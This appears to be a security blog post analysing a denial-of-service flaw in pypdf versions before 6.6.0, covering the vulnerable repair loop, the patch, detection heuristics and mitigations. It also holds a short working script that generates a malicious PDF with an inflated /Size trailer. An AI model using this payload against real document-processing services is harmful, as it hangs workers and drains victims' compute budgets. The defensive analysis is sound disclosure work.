Feb 22, 2026
pypdf tries too hard to fix broken PDFs. If a file is missing the Root object but claims to have 2 billion objects in its Size trailer, pypdf will check every single one. This loops until the CPU burns out or the universe ends.
A resource consumption vulnerability in pypdf allows attackers to trigger a Denial of Service via malformed PDF trailers. By removing the '/Root' key and inflating the '/Size' parameter, the library enters an effectively infinite loop trying to 'repair' the file, consuming 100% CPU.
We often praise software for being "robust" or "fault-tolerant." In the world of PDF parsing—a format that is essentially a dumpster fire of legacy specs and vendor-specific hacks—libraries have to be forgiving. If a PDF is slightly broken, users expect the library to fix it and show them the content. Enter pypdf, a pure-Python library that powers thousands of document processing pipelines.
But here is the catch: there is a fine line between being helpful and being gullible. CVE-2026-22690 is a classic example of the latter. It is not a memory corruption bug; it is a logic flaw born from kindness. When pypdf encounters a specifically malformed PDF, it doesn't throw an error. Instead, it rolls up its sleeves and attempts a "recovery" operation that an attacker can trick into taking effectively forever.
This isn't about stealing data; it's about freezing the gears of any application that processes untrusted PDFs. Think invoice parsers, resume scanners, or automated archiving bots. One 1KB file can lock up a worker thread indefinitely.
To understand the bug, you need to know a tiny bit about PDF structure. A PDF has a "Trailer" dictionary that tells the parser where to start. The most important key in the trailer is /Root, which points to the Document Catalog (the root of the object tree). The trailer also usually contains a /Size key, indicating the total number of objects in the file.
Here is the logic flaw in pypdf versions prior to 6.6.0: If the /Root key is missing (which makes the PDF technically invalid), the library assumes the file is just slightly corrupted. It activates a "recovery mode" to hunt for the Catalog manually.
How does it know where to look? It asks the /Size key. If the file says, "Hey, I have 100 objects," pypdf iterates through object numbers 1 to 100, resolving each one to see if it looks like a Catalog. The problem is that /Size is just a number in the text file. An attacker can set /Size to 2,147,483,647 (2^31 - 1, the 32-bit signed INT_MAX), remove the /Root key, and provide a file with only 1 actual object. The library will then dutifully attempt to resolve 2 billion non-existent objects, burning CPU cycles on dictionary lookups and file seeking for hours.
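To make the mismatch concrete, here is a rough sketch that compares what a trailer claims with what the file actually contains. It is a regex heuristic over raw bytes, not a PDF parser, and the name `inspect_trailer` is made up for illustration. It assumes a classic uncompressed trailer and would miss objects packed into object streams.

```python
import re

# Heuristic patterns for a classic (uncompressed) PDF; this is not a real parser.
SIZE_RE = re.compile(rb"/Size\s+(\d+)")
ROOT_RE = re.compile(rb"/Root\b")
OBJ_RE = re.compile(rb"(?<!\d)\d+\s+\d+\s+obj\b")


def inspect_trailer(data: bytes) -> dict:
    """Compare what the trailer claims with what the file contains."""
    trailer_at = data.rfind(b"trailer")
    trailer = data[trailer_at:] if trailer_at != -1 else b""
    size_match = SIZE_RE.search(trailer)
    return {
        "claimed_size": int(size_match.group(1)) if size_match else None,
        "has_root": ROOT_RE.search(trailer) is not None,
        "objects_found": len(OBJ_RE.findall(data)),
    }


# A trailer that claims far more objects than the file defines, with no /Root.
sample = (
    b"%PDF-1.7\n"
    b"1 0 obj << >> endobj\n"
    b"trailer << /Size 2147483647 >>\n"
    b"startxref\n0\n%%EOF"
)
print(inspect_trailer(sample))
```

A missing /Root combined with a claimed size that dwarfs the number of object definitions is exactly the shape of file described above. As a pre-filter this is only a hint, since legitimate files can also trip a heuristic this crude.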
Let's look at the smoking gun in pypdf/_reader.py. This is the code that runs when strict=False (the default for PdfReader, and the mode most pipelines prefer for compatibility).
Vulnerable Code (< 6.6.0):

    # Inside PdfReader.root_object
    root = self.trailer.get("/Root")
    if root is None:
        # Oh no, no Root! Let's find it.
        nb = self.trailer.get("/Size", 0)
        # The Loop of Doom:
        for i in range(nb):
            # This triggers parsing logic for every theoretical ID
            obj = self.get_object(i + 1)
            if isinstance(obj, DictionaryObject) and obj.get("/Type") == "/Catalog":
                self._validated_root = obj
                break

See that range(nb)? That is the kill switch. The variable nb is taken directly from the attacker-controlled input. There was no cap, no timeout, and no sanity check.
The Fix (v6.6.0):
The maintainers introduced a sanity limit. Even if the file claims to have billions of objects, the recovery logic now gives up after a set number of attempts (default 10,000).

    # The patched logic
    limit = self.root_object_recovery_limit  # Default 10000
    nb = self.trailer.get("/Size", 0)
    # Bounded range prevents infinite loop
    for i in range(min(nb, limit)):
        # ... logic ...

It is a simple fix: never trust the input to define the bounds of your loops.
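The difference between the two loops is easy to see in a toy model. The sketch below is not pypdf code: `find_catalog` is a hypothetical stand-in where a plain dict plays the file and a counter tracks how many lookups the scan performs. Returning `None` when the limit is reached is this sketch's choice, not a statement about how pypdf behaves at its limit.

```python
from typing import Optional


def find_catalog(objects: dict, claimed_size: int, limit: Optional[int] = None):
    """Toy model of the recovery scan; returns (catalog, lookups_performed).

    `objects` maps object numbers to parsed dictionaries and stands in for
    the file; `claimed_size` plays the role of the trailer's /Size value.
    """
    bound = claimed_size if limit is None else min(claimed_size, limit)
    lookups = 0
    for number in range(1, bound + 1):
        lookups += 1
        obj = objects.get(number)  # stand-in for resolving an object
        if isinstance(obj, dict) and obj.get("/Type") == "/Catalog":
            return obj, lookups
    return None, lookups


# One real object, but the "trailer" claims 500,000 of them.
fake_file = {1: {}}
_, unbounded = find_catalog(fake_file, claimed_size=500_000)
_, bounded = find_catalog(fake_file, claimed_size=500_000, limit=10_000)
print(unbounded, bounded)  # 500000 10000
```

Without a limit, the work scales with whatever number the attacker typed. With one, it scales with a constant the defender picked.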
We don't need a complex fuzzer to trigger this. We can write this "exploit" by hand in a text editor. We need a valid PDF header, one dummy object so the parser doesn't crash immediately, and a malicious trailer.
Here is the recipe for disaster:

1. Header: a standard %PDF-1.7 line.
2. Body: one dummy object.
3. Trailer: omit /Root, set /Size to max integer.

    # malicious_gen.py
    exploit_pdf = (
        b"%PDF-1.7\n"              # Header
        b"1 0 obj << >> endobj\n"  # Object 1 (Dummy)
        b"trailer << "
        b" /Size 2147483647 "      # The Trap: 2 billion objects
        b">>\n"                    # Note: No /Root key!
        b"startxref\n0\n%%EOF"     # End of file
    )
    with open("dos.pdf", "wb") as f:
        f.write(exploit_pdf)

When a vulnerable pypdf instance opens this file and tries to access reader.pages or any property requiring the root, it hits the root_object property. It sees root is missing. It reads /Size. It starts counting. If you monitor the process, you'll see one CPU core instantly pin to 100%. In a single-threaded Python web worker, this request will not return until the web server times it out.
Security researchers often roll their eyes at DoS bugs because they don't provide a shell. But in the context of modern cloud architecture, this is a wallet-draining vulnerability.
Imagine a SaaS platform that allows users to upload PDFs for OCR or signing. These services often use Python backends (Django/Flask/FastAPI) wrapping pypdf. If an attacker uploads 10 of these 1KB files, they can tie up 10 worker processes for hours, or until something kills them.
If the infrastructure creates new instances to handle load (autoscaling), the attacker just triggered a financial exploit—forcing the victim to pay for compute credits to process a loop that does nothing. Because this happens in user-space Python code, it might not trigger low-level segfault protections. It just sits there, burning electricity.
The remediation is straightforward, but it requires action. The patch was released in version 6.6.0.
Primary Fix: Update your requirements file immediately.

    pip install "pypdf>=6.6.0"

Workaround (If you can't update):
If you are stuck on legacy versions, you must instantiate the PdfReader with strict mode enabled. This disables the recovery logic entirely. If a PDF is broken, it will raise an exception instead of looping forever.

    from pypdf import PdfReader

    # strict=True disables the "best effort" recovery
    reader = PdfReader(stream, strict=True)

However, be warned: strict=True is very strict. It will reject many benign-but-slightly-malformed PDFs that users generate from cheap export tools. The only real fix is the patch.
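As defense in depth alongside the upgrade, a pipeline can refuse to let any single parse run forever. The sketch below is one generic way to do that with the standard library: run the parsing step in a child process and kill it at a deadline. The helper name `run_with_deadline` is made up here, and a busy loop stands in for a stuck parser so the example runs without pypdf installed.

```python
import subprocess
import sys


def run_with_deadline(argv: list, seconds: float) -> str:
    """Run a command and return "ok", "failed", or "timeout"."""
    try:
        completed = subprocess.run(argv, timeout=seconds, capture_output=True)
    except subprocess.TimeoutExpired:
        # subprocess.run kills the child before re-raising, so the CPU is freed.
        return "timeout"
    return "ok" if completed.returncode == 0 else "failed"


# A busy loop stands in for a parser stuck in the recovery scan.
stuck = [sys.executable, "-c", "while True: pass"]
print(run_with_deadline(stuck, seconds=1.0))  # timeout
```

In a real pipeline the command would be your own worker script taking the uploaded file's path as an argument. A deadline does not fix the bug, but it turns "hung indefinitely" into "failed after N seconds".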
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

| Product | Affected Versions | Fixed Version |
|---|---|---|
| pypdf (py-pdf) | < 6.6.0 | 6.6.0 |
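The affected range is simple enough to check in code, for example in a startup self-test or a CI gate. This is a minimal sketch with hypothetical helper names (`parse_release`, `is_affected`). It only compares the leading numeric components and ignores pre-release suffixes, so a string like "6.6.0rc1" is treated the same as "6.6.0".

```python
import re

FIXED = (6, 6, 0)  # first patched release, per the table above


def parse_release(version: str) -> tuple:
    """Extract the leading numeric components, e.g. "6.5.0" -> (6, 5, 0)."""
    match = re.match(r"\d+(?:\.\d+)*", version)
    if match is None:
        raise ValueError(f"unrecognized version string: {version!r}")
    parts = [int(p) for p in match.group(0).split(".")]
    parts += [0] * (3 - len(parts))  # pad "6.6" to (6, 6, 0)
    return tuple(parts)


def is_affected(version: str) -> bool:
    """True if the version falls in the vulnerable range (< 6.6.0)."""
    return parse_release(version) < FIXED


print(is_affected("6.5.0"), is_affected("6.6.0"))  # True False
```

In a deployment the version string would typically come from `importlib.metadata.version("pypdf")`.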
| Attribute | Detail |
|---|---|
| CWE | CWE-400 (Uncontrolled Resource Consumption) |
| CVSS v3.1 | 5.3 (Medium) |
| Attack Vector | Network (Context-dependent) |
| Impact | Denial of Service (High CPU/Hang) |
| EPSS Score | 0.00019 (Low Probability) |
| KEV Status | Not Listed |
The software does not properly control the allocation and maintenance of a limited resource (CPU), thereby enabling an actor to influence the amount of resources consumed, eventually leading to the exhaustion of available resources.